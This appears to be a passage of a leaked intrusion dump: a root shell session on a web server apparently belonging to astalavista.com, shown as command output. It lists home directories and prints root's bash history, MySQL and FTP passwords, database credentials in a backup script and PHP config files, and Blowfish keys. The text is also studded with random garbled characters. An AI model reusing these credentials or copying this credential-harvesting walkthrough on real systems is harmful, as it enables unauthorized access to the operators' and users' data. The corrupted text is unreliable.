, T% }5 x3 _7 G' U1 N6 V% j, {8 w#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
( s4 @" S' E! l8 F/ o# |__| [__ | |__| | |__| | | | [__ | |__| #4 h. v; _ V7 r
# | | ___] | | | |___ | | \/ | ___] | | | #
9 d2 k$ @+ l m* x- ^) c# #
% U0 ^, p/ x; ] |' U( s#####################################################
+ Q1 }7 E& \( U. Z& |# P0 a# #$ G& N7 w) U# n, Z" D: t9 A
# Admin Contact - 链接标记support@secureservertech.com #$ m4 Z' X P: |: t4 T
# #
, h9 f+ R7 z4 a' `7 O* S6 t$ N# Available ShortCuts #. _) Z' y/ j0 Q- u+ ]6 I, L
# #8 T5 m- K" [ g/ y9 f p$ s
# nst - list active connections #
" [+ x0 d- r7 x$ h: Y+ @( }# ddos - shows how many times each ip is connected # Z& g4 R0 t) q/ ?
# ltr - restart the webserver #! J. e; H) P" K \3 I! L# q
# phpc - edit the php config file #7 Y- ~ F* J5 f3 O
# htc - edit the webserver configuration file #- N9 H; @. W! J1 Q
# up - uptime #& a- }1 t+ M+ L
# etd - edit the motd of the day file #7 @4 A) m* x5 L0 T3 V) B6 z2 t; ^; H) P
# htr - start and restart apache if needed #
' H, j* \( ]' L- K6 V" R( D# syng - shows active SYN_RECV connections #( | D& w) ^# ?3 k. Z o2 a1 k
# synd - syn flood blocker - “synd -h” for usage #
2 L, u! d7 _' h" ]#####################################################: \7 X0 }# D _2 I' a/ ` I
# NOTES: #; `, D: X5 i* x; [* c+ F; Y7 K
# Last Upgrade - 12-08-2008 by JF #' q0 d+ y5 I1 @- w+ e6 m
# My.cnf/Mysql Optimization - 1-28-09 #9 N8 I4 A" n' b
# #5 S* u4 k: E$ F" M* u
# #5 t5 R* S( W1 p- l
# #' q4 ?- l# ?6 q7 b0 R, A; ]
#####################################################
* v3 B7 t- e: d& L b7 V5 C' o+ C! Q8 a, ~& U/ N
sh-3.2# lastlog | grep -v Never, g8 A! M' A1 Z" V$ t$ f
Username Port From Latest
- `- H" X% d/ r" M: [root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
+ J% R! Y1 X, |7 padmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
9 x7 v% b6 @9 ?: y+ C+ Vcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
4 T/ G) a2 s3 m- m6 H1 N& S9 Yastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
. Y, ~; n3 t2 {4 U3 z! h4 l" R8 I/ P( k7 Y' \* z
sh-3.2# ls -la
_/ N4 C) d- H1 t6 W9 ^total 453376
$ k' k$ D& _: O+ Hdrwxr-x— 15 root root 4096 Jun 4 08:40 .* u. V) `- [/ U' \* o& t
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! G3 i- z% V2 b" C9 V
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip0 W& ^6 p) H f
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
; `! ` W/ T+ n% K: j-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
' C2 [8 n0 |% G-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
" H* l; R$ U3 W" v-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
4 J+ n4 J3 e. g$ q-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc# T. u9 o1 c8 A: G
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh, f& k( T9 e7 q; K' U- k
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
# d' y4 s0 K& I2 N1 z) s2 f6 `-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql+ _4 k3 t/ B% H1 R4 M
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan3 z% l" t! b: R% K' `6 E: d, C
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
2 o! @ V; ]9 N! Z-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
_6 S2 {$ _5 mdrwx—— 2 root root 4096 Oct 28 2007 .elinks$ I8 e+ l* }) u
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
- B# }' M$ z2 b% @" S! ]4 C-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz25 M2 X0 q# r- x1 e( D
-rw——- 1 root root 0 Apr 16 13:19 .history
9 V# }& h3 H, S+ d-rw-r–r– 1 root root 16095 Sep 11 2007 install.log1 I9 Q6 j: P* _. ]4 K5 K2 `7 j
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog4 ~9 @8 c' _9 d9 y1 v; E( M! x
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
2 |: B) X6 X" T# i, j7 c-rw——- 1 root root 35 Jun 2 14:23 .lesshst
8 x2 E6 l4 w& jdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp5 n3 J" x% U6 }, j+ s) E: o, o
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec3 F N* w0 g. l+ h
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
, W. B8 r1 K( s-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
1 Q" Z# q7 J7 l r-rwx—— 1 root root 760 Sep 18 2008 lp- h' |4 h. m3 z8 K
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
[ {0 c" {9 G-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz. ]% e$ K9 e' C8 K* b6 L
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
( D$ ~) A+ O" adrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
( M4 j' z8 N5 Z% c9 b2 D9 t-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz l+ f+ R& u* ^$ j0 a* x+ D
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.37 P5 s( f% O6 m3 Z u, [4 z" n
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz7 `, k5 K. m6 P* c9 [. B
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
" q! u' e$ Q. b. [2 B* k/ I-rw——- 1 root root 41 Oct 19 2007 .my.cnf. ]& d" I) Y F) c: C0 e
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history7 G0 N3 Z+ h; Q7 D' b, O
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
' [8 A+ z( U: F2 D& V1 c-rw——- 1 root root 41 May 20 2008 .mytop
5 D% P9 I9 a% d+ Fdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6; H7 F9 W" u. @# T& h1 c
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
+ N2 h8 E& {, o& O9 F/ @' O5 l G' wdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
/ t7 P6 T. S7 L' m- N. Z3 @/ `-rw——- 1 root root 1462 Sep 21 2007 opt.php
, ~5 ^4 L- |8 _" m! o, g-rw-r–r– 1 root root 3371 Sep 22 2007 p
9 L! H! n- K! w2 d-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2' s$ i* O8 j8 b0 \
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
) g, Q1 h7 l4 t-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
3 U3 G9 c( ?) P-rw-r–r– 1 root root 887 Nov 28 2007 server.key
" G9 r) N& a$ @6 }( Ydrwx—— 2 root root 4096 Oct 10 2008 .ssh% b1 l1 B) ~& ]# h9 ?" A" R
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat c, I+ `- K" G& U% G
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
: e/ h( x0 r) E Z# P2 O8 u-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip6 q+ S) q* @# v( `! L/ @9 P2 ~
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.18 R1 I+ r$ V/ Y6 M9 ~ `, T" G
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
3 m# U2 C U+ O% p# D6 t! j8 Q-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
; k0 h- v! x$ A5 E i; ldrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.06 W z1 M+ `; h1 ~" \. y9 s
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
: j( n2 I" L( m# y) \-rw——- 1 root root 12997 May 16 2008 .viminfo
7 M- ]1 B) S( l: {6 s3 Q( |7 E/ [ s% L/ m. C$ |9 `' ^$ |
sh-3.2# cat .bash_history
6 S7 n2 X$ q5 Y5 N' n& v[snip]5 A- P$ a( r/ x- T# Q0 W6 t7 ^
wget cp4sst.com/sstlinux.tar.gz
& s* {( r) ^; f; J2 s$ dtar zxvf sstlinux.tar.gz* @& S( _7 V; u3 j' G" \
cd linux-2.6.27.10; F6 v2 ]5 I+ N: C7 \2 f' u( C5 W d
sh install.sh7 U! {" w& K L( z( Y0 F
make bzImage ; make modules ; make modules_install ; make install
1 Z' C- f6 Y: Q2 \make clean
P) h0 \( b' @9 D* S% ]3 o" m% \) [service mysqld restart
! ?3 o8 u! t- q' \' K, T8 o$ }: F[snip]2 y# E0 x+ ]; L% b, F
cd /usr/sbin/3 }( S" U: v3 @- _
chmod 4777 traceroute
: O% `8 e; C$ P0 X4 a7 ^chmod 4777 ping! m C+ E+ }! Q. @) h# w8 H4 C% R& @
traceroute -I 链接标记[url]www.astalavista.ch[/url]
+ I( R" m; f9 ^5 o5 u) B[snip]
0 @# s* ]( M' n1 Z5 svi /etc/csf/csf.conf$ x* L& F( J% J
traceroute google.ch: ^: F) f3 I" Z
service csf restart. m/ G+ N y' g; U, Y# [2 C! f
tracert google.ch
: x( ]) n4 Z7 E) s; M/ hservice csf restart- x: \& J0 N0 i* ?2 y3 A
traceroute 链接标记[url]www.google.ch[/url]# x2 s9 y* m6 l4 k* [/ O- m L# ?
tracert 链接标记[url]www.google.ch[/url]; B0 m+ h3 g, J) ?8 N, F
traceroute 链接标记[url]www.google.ch[/url]/ D$ L. D0 E( P5 [1 U
locate traceroute
- k: O0 O" R0 M4 ?! x6 |- L9 A7 B# }chown 4755 /bin/traceroute3 B2 a& j2 l# F4 |
chown 4777 /bin/traceroute
8 Y4 s' ?2 J6 x- }& tlocate ping
* I. v6 A% A8 x a8 C! U4 kchown 4755 /bin/ping
& r. Y' z+ d. E& l3 y) Uchown 4777 /bin/ping' F1 d+ a. c/ s$ o" w& }5 }7 E
cd /bin/
5 H$ [& y) c0 J/ U/ H# v6 |ls -ali | grep ping
8 I( i" M8 e$ l" h# lchown root ping
! o: u( \ ~0 x, ^4 {; n& Achmod 4755 ping
" T* w x. i; {, s$ q; Rls -ali | grep traceroute
" t3 i# |" A7 C1 ^1 schown root traceroute1 O( C# N4 w& M( \* H6 ~
chmod 4755 traceroute
$ L4 M, i- F$ H: q# h. b1 wls -ali | grep traceroute' r3 k* c" f9 e8 o$ \) ^, \" l
traceroute -I 链接标记[url]www.google.ch[/url]
9 v" W( x: I9 Z3 }$ _traceroute 链接标记[url]www.google.ch[/url]
7 F) k: U# R9 ?5 y7 U& K: w& q( Gwhois pmsantos.ch! y3 O% O$ m& a. F: M
[snip]; b/ H3 n' [2 C* @! Y* D; r/ o" s
mysql -h com_contrexx2_live < /root/defaultp_ports.sql# l! a4 }) J: ~
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
* k& i8 L0 |0 |+ n' B7 B9 omysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
( A+ O4 `9 w0 X& E# mmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql$ y! U* }' j' a. Y
top+ f+ o( p6 L5 Z. E/ q
ping ssth.ch1 y6 F# w; r# f2 ]/ k' d! T
ping asdlkfaljgasd???ljg???lasj.ch# w5 y: r4 j* @6 D9 N+ I# F/ V- x/ n9 H
ping asdlkfaljgasdlasj.ch, e0 t8 ^0 h# l" y0 _$ j/ C
ping 链接标记[url]www.ssth.ch[/url]
- }4 M* R: P! ~ping ssth.ch* Z4 A8 h2 w* T7 E
nslookup 链接标记[url]www.google.ch[/url]
0 K: {5 f0 z4 Cnslookup 链接标记[url]www.ssth.ch[/url]% \5 t9 h/ k5 B$ l
man nslookup0 d8 b1 G5 A+ V. a9 Y( G% k
ping 链接标记[url]www.google.ch[/url]
4 _; N9 L8 Q" Y- M& _9 Nnslookup 链接标记[url]www.google.ch[/url]9 ?5 s/ T- V: p
nslookup 链接标记[url]www.google.ch[/url]3 Y) Z! d# {+ d+ u8 S
nslookup salfjasdlf.ch2 _# |$ w) [0 r
[snip]
& B, i3 {$ x. a: D8 |9 T$ W. Vopenssl passwd -1 sadf
: H1 C9 E B, z* H, T& Eopenssl passwd -1 5cZNHstdTy3 u! Y$ P1 M" V c+ d9 f
mysql
: q: a( D/ F: x q2 q8 N. {mysql5 K) |2 [5 T& b. K
locate proftp9 g. L, u* Q- L/ P+ K I9 h# Y; P
vi /etc/proftpd.passwd
, {' U |/ Q0 @service proftpd restart1 f% R/ D! a3 \$ y; X4 @4 K' G
locate proftpd.conf
. i( c2 t# ]' B8 c6 hvi /etc/proftpd.conf; p1 c+ u! m0 E3 e' a& q6 T3 s
vi /etc/proftpd.passwd- G) ~. c( r; }0 Y. ~8 @) Z$ n
service proftpd restart
& a2 t7 k0 e3 }* x. G7 W0 n[snip]
/ ~# |3 T7 y( v/bin/sh /home/com/backup_system/backup.sh9 P' @ U" ]7 b8 q. X! i2 {: n! P
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin& ^" ?! v' u+ k) |8 c
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql- a) ^. W# `% G5 T: K
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
8 J7 D9 v& n4 Q+ ]" c- f/ }- Z7 q2 Nls -ali
% E5 e( K% c" R; n6 l, tmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql. H+ B o5 o% H7 L s7 d, D
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql3 L" r6 B4 c6 L$ y0 ] Y& v5 {
crontab -l
7 C1 g% ]& |6 r" n+ ~9 ]crontab -l) o" y: R6 [2 t0 D5 A. c& D
php -q /home/com/public_html/modifications/cronjobs/securitynews.php/ P; d- t I8 Q" W( g3 F
/home/com/public_html/modifications/cronjobs/exploits.sh
6 R0 ?9 H1 S7 z8 y# s5 p. kwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]- f* B) [. a6 N
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
- ~# G5 Y3 x- R4 zcd lsws-4.0.3( M* N0 ?/ C9 t! I
sh install.sh
g8 O8 R* b% A. T7 e; q9 S" l# nuptime
8 |- H4 p) b7 H$ m6 n+ {2 ~hdparm -tt /dev/sda- L0 h% p7 j( v* c- [
iostat1 z! X2 q z9 | H: W7 w) ]* _: l
yum install iostat0 Q6 T2 V+ p9 I2 X; p: {
iostat3 m0 }. |, t/ Q
whereis iostat* t( L( a; L% B+ ~# \0 T" j
yjm clean all
, s5 {+ k: G8 |; _( B& Ryum clean all ; yum -y update: a% l& z [4 M9 Y2 A
iostat3 d6 E' U( \7 r% [$ J+ l( E- x G/ M
yum install systat( _$ A$ _4 m6 B( R
rpm -qa | grep iostat
, O" i5 Z! f! F+ C1 I% p* _2 Irpm -qa | grep sysstat
$ i$ j* D( f8 ?3 I, t( Erpm -qa | grep systat
$ l0 ]+ v0 l' |; O* Ydmesg -c1 E h# ]: D$ R
sysctl -p
: ?* z$ H' M; T1 n+ M) Yuname -r
# ^, q6 U- h/ m0 P9 C1 @cd /usr/src: i0 u% n( @# V: C
wget nix101.com/kernels/sstlinux.tar.gz
2 z0 b3 I1 W# L$ |( T# u6 [* Ashutdown -r now: n8 m0 _6 d' y" s# u
nano -w /boot/grub/grub.conf1 i H* C) h7 N. S* _$ V4 v4 Z. C
6 [5 N5 Q8 {" K5 h7 N# ysh-3.2# cat .my.cnf
+ l: p0 i4 Q* k0 X: V$ Q) z[client]
' c2 @4 g1 N3 i* ^% yuser=da_admin( V3 G" t& f4 r
password=X9dctmRH: G4 e, h' i5 _7 s
* S2 Y. C2 u6 J. z( @" D) r# ]- F
sh-3.2# cat /home/com/backup_system/backup.sh" M+ B) Y! n1 s0 \( {& ?0 A9 ?
#!/bin/sh
- N; D2 l! X0 q; |$ p$ ~' m9 E5 l#####################################################################( r9 ^" \8 f( ?+ x! n
# #- k `5 q& q- }( n
# incremental backup for astalavista.com #. u1 n9 s( q! g1 b5 d3 l
# #2 R/ F- b, E% l2 `
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #. b$ j- h" P+ i5 {/ p
# #( @/ N6 ^! c; }( m
#####################################################################
& C) v R' F. m" Q. D, `7 x[snip]/ o" K2 T; y y# p
PROG_DIR=”/home/com/backup_system”;
0 F$ l6 g7 q$ C c8 f' ^BACKUP_DIR=”/home/com/backups”;
$ n5 U- v6 z0 q8 n e: zDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
y0 m2 {- Y8 w# ftp for synology backup server
; O3 `4 }. f7 `3 I, w* C$ F! l/ cFTP_HOST=”212.254.194.163″;, M! K* z9 N+ V! r7 v
FTP_PORT=”21″;
` A& f+ p$ C$ eFTP_USER=”astalavista.com”;0 X' |$ U8 N9 I" S8 P) p: O
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
% \- K$ V; J% P5 i+ D+ QFTP_DIR=”/astalavista.com”;
4 U- g& X# b1 y* o" v, h2 e# database# g, h0 O9 I' V' X
DB_HOST=”localhost”;
' S2 c9 M7 T% U3 U9 k' L2 PDB_USER=”contrexxuser2″;
9 e* \6 o) S$ |4 c! ]4 a7 O! ODB_PASS=”0fEYNZgXz1pKe”;* M1 [% K& ]/ ]; K2 ~ x+ M
DB_DATABASE1=”com_contrexx2_live”;
; E8 g4 Z3 S( R3 S0 o! ODB_DATABASE2=”com_contrexx2″;
0 i) n% x2 W$ T3 R' a/ I9 M% n" x[snip]
4 |1 T B/ f. v0 [+ m' `; j8 Fftp -in $FTP_HOST $FTP_PORT <<EOF5 n$ w, G0 X& k5 |* F0 R
quote USER $FTP_USER* ^, O7 P) y. a1 b. x
quote PASS $FTP_PASS' y* ^* c9 z. s& _
cd $FTP_DIR5 g# f. H8 N, U
put $DB_FULLNAME-SQL_Dump.tar
* a. i; y' y% j' |2 N7 l) nput $BACKUP_FULLNAME-Public_HTML.tar
% p' D# e, M3 r% F; }% Q1 B- oclose
/ J6 g. Q5 Y! y1 y8 k9 Qbye) ^( ?2 ~% F2 @6 S( L* }0 Z$ x
EOF
" P1 R8 _3 b# [! ]: J5 Y8 f1 d
/ W" [$ z1 f z( P3 ?2 Msh-3.2# cd /home: j, U- [+ e& s; |
sh-3.2# ls -la
% m0 Q1 Q1 L( X2 `6 w% B: V& q( {total 120
+ z6 t$ Z. S7 ]4 u; K4 Udrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
# b. I* A7 g7 B! G- W& l9 jdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .., i" E& q: P5 l5 k2 O- Q: ?
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
8 S* v3 D" j- \' i-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
) N& G& I4 l' S( y-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
$ o6 x: p& z' @1 B$ ~1 x# xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
& e9 o: c3 p8 F pdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup/ c# y, M" ~8 `. F0 ^3 L
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
5 @$ T1 K+ q. K) F- bdrwx–x–x 10 com com 4096 Apr 28 12:40 com
: y! W1 A M8 ndrwxr-xr-x 2 root root 4096 May 17 2007 ftp J* R" }6 m( j3 g! ~6 G% w3 x
drwx—— 3 jon jon 4096 Sep 21 2007 jon9 [ l; K! i; V
drwx—— 2 root root 16384 Sep 11 2007 lost+found- }) r- O, \- u
drwxr-xr-x 2 root root 4096 Sep 14 2007 my* f( d( S2 U$ G# k4 q
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata' Q5 L! X# S$ q7 q6 U; V
drwx—— 2 jon jon 4096 Sep 15 2007 test
: e( i$ Y: `4 S6 tdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp. h& x% J. e3 e
( n V4 W. c( h5 K8 ~
sh-3.2# cd admin
! y6 V; D0 V" T5 C1 c* O1 t" A ksh-3.2# ls -la5 a0 }& G: z& O* T" f
total 1735896
# C* ~& D; I# b3 ?: Xdrwx–x–x 9 admin admin 4096 Nov 28 2007 ., e* `% c* c: N3 r% O% J1 t1 ]. I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 [8 x/ V8 O" i2 j9 C3 {: rdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups( I' `7 `; {4 J6 q
drwx—— 2 admin admin 4096 Sep 28 2007 backups3 E/ U9 ?9 H( r( V+ ?
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history9 a) U: |; I* A0 g. P, z, h, U
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
+ I* d. G- T" f" p- r, p-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile" f: j" M( b U7 p7 B
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc% g8 E$ }8 s0 U
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
' ]& S4 N: C3 _3 `drwx–x–x 6 admin admin 4096 Sep 21 2007 domains' t: y' J. p/ ]7 B7 {" z3 I
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
5 _& v6 b# A/ E+ U-rw-r–r– 1 root root 24 Sep 21 2007 info.php
. R0 S* m* D3 Qdrwx—— 2 admin admin 4096 Sep 21 2007 mail
( w3 ]5 S2 h6 S Y) r k; c$ n-rw-r–r– 1 root root 716 Nov 28 2007 server.csr. O% w& ^, E( Q7 J. `6 K$ b2 z. w: j
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
& d; m- s9 p6 u% f( j/ m b' d-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
! i) J# g/ |! }! m5 k; x-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
( t% U" F9 v7 e/ E' k2 ?! wdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
5 o* l3 s8 q$ p
1 \. P& ?5 `+ ]" ]* `sh-3.2# ..6 D* V5 p3 k2 J, f% x- D
sh-3.2# cd jon# @* w% Z9 Z; c5 y
sh-3.2# ls -la
3 H: w) |* Q, ftotal 36- N, R7 |& }1 r% {" ~
drwx—— 3 jon jon 4096 Sep 21 2007 .( E2 l6 K& M0 }5 I8 h' F
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 ?9 u. k/ b2 I& O0 i
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history1 W8 z( C( d; l$ o
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
3 O8 g7 s [7 n% @6 T0 m# b-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
; w8 a' ]+ p8 L! }9 I4 @0 T- A1 D9 z-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc5 B" \1 e, G4 b4 w# w
-rw-r–r– 1 root root 24 Sep 21 2007 info.php- S6 ^* p# [5 J0 y) c
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html- y3 v$ q7 Y. U
( z! g% F3 e S* S3 x: o" ^0 wsh-3.2# cd ..4 N: x! _& G- ?8 \1 }) i
sh-3.2# cd test# G1 e+ s8 j1 w
sh-3.2# ls -la/ j- |/ f/ D- M, Z H3 H0 E
total 48) m6 b( Y; T8 Y9 p( u6 N3 B% x
drwx—— 2 jon jon 4096 Sep 15 2007 .
- I8 I' N3 W4 z$ r8 G5 a* h3 Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 z' W. E7 ]2 y8 G- @
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history# n. ~3 z0 ]* Q* Q
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
5 N) L+ g j8 Y# G-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile6 M: I% U7 E: N0 K. {4 k# ~, {" ?
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc& R+ D- U! ~$ e0 i5 P# I' ?
sh-3.2# cat .bash_history* z9 W3 e0 q( w
/usr/bin/mysqladmin -u root password PoliuJhytg67
, w! n/ R: d* h! l8 L9 n8 W; g2 c9 }
sh-3.2# cd .., |) Y0 t6 S* s$ h+ [" G0 C$ {6 e
sh-3.2# cd astanet
6 U+ C. a- ]) C/ v$ z% Fsh-3.2# ls -la
7 I4 i$ N% w0 i1 k* }total 52
* [* o( q9 h( @( p; Sdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .8 v1 d, h. ~" `3 |: Z4 p* H
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 g, m; N1 c0 D% W- K- cdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth# N9 N; }" A4 P( D C
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
8 j9 C& K- T R# z( S1 B" s( ]-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
8 u$ Q% s; `! F$ S. c, G-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile3 J5 S" g6 E; ]
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc: b6 z" F! F& l" B
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains8 z9 f9 i: B+ w9 B
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap5 F; l2 u2 S3 m& v/ }
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail0 D/ U( ^4 S# f
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
: {& O2 n2 p# U. W8 z- S& a: elrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html" k- X1 }6 n/ H8 n6 K
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
1 N [! L$ u' _% W0 \" T4 K4 E0 k$ ^ c. p
sh-3.2# cd auth/
2 O1 B1 d$ {$ p: U# `sh-3.2# ls -la' \* a, g5 v M4 V2 N2 J
total 28
+ F G, o6 U6 y$ w3 v" |+ s2 r( o! _drwxr-xr-x 2 root root 4096 Dec 23 16:00 .1 C# V7 x7 X4 Q" k1 ^/ j
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
$ y, Q0 o2 O }9 j-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
6 h# L5 x9 ~0 A( ?' ?' R-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php$ G" i- i0 S3 a9 [! z7 d
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
/ x" p6 V q, ]-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting+ c$ B$ `% N( R: B" t0 i ^$ f
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd) O' O- p$ V) A- t" ]. Y j' }
( l, I, Z0 P" \9 `& Rsh-3.2# cat hackercontest.config.inc.php, k5 A) h2 R6 b t4 e( ]8 D: i
<?PHP
9 p u- U; C1 V- y$ L// Variabeln f?r Verbindung zur Datenbank //) `2 _( g/ E. M, q
$conxHost = ‘localhost’; // MySQL hostname5 N4 v. X; c% W s# P' m7 l0 S& t
$conxUser = ‘hackercontest’; // MySQL user* T! Q4 Y) s# e/ H
$conxPassword = ‘K6m@7dUc’; // MySQL password
" E9 m! m0 d6 n7 n$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
3 T$ b$ A) G" S/ ?& M) C% t?>7 n" H0 v, J2 a% d! L
sh-3.2# cat hosting.config.inc.php
) K* Y, W, x* w" U<?PHP
7 M: s& ^9 J4 d7 F* J// Variabeln f?r Verbindung zur Datenbank //
. H3 h7 i; n# w$conxHost = ‘localhost’; // MySQL hostname2 d1 W# P. h/ H/ e3 R5 [% w
$conxUser = ‘hostinguser’; // MySQL user
; ]0 d& L2 I9 k% [- C$conxPassword = ‘cXvB3981′; // MySQL password
% q' Z$ ^% z e; Q8 A$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
e9 H) F- e2 z?>7 G& a' k7 q7 L' }, G$ m9 e" r
" i) [1 Q) D3 ?, ish-3.2# cd ..
L% ]7 f- ~( o8 i# X& |sh-3.2# cd com
( x$ k2 x4 S# E7 x3 g- Zsh-3.2# ls -la( C: V0 j- |0 l2 i4 W
total 141208
7 R$ z& P9 s& M1 ~; y! C0 A ^3 Pdrwx–x–x 10 com com 4096 Apr 28 12:40 .6 D8 p/ n4 {% N3 C& f+ |6 W
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
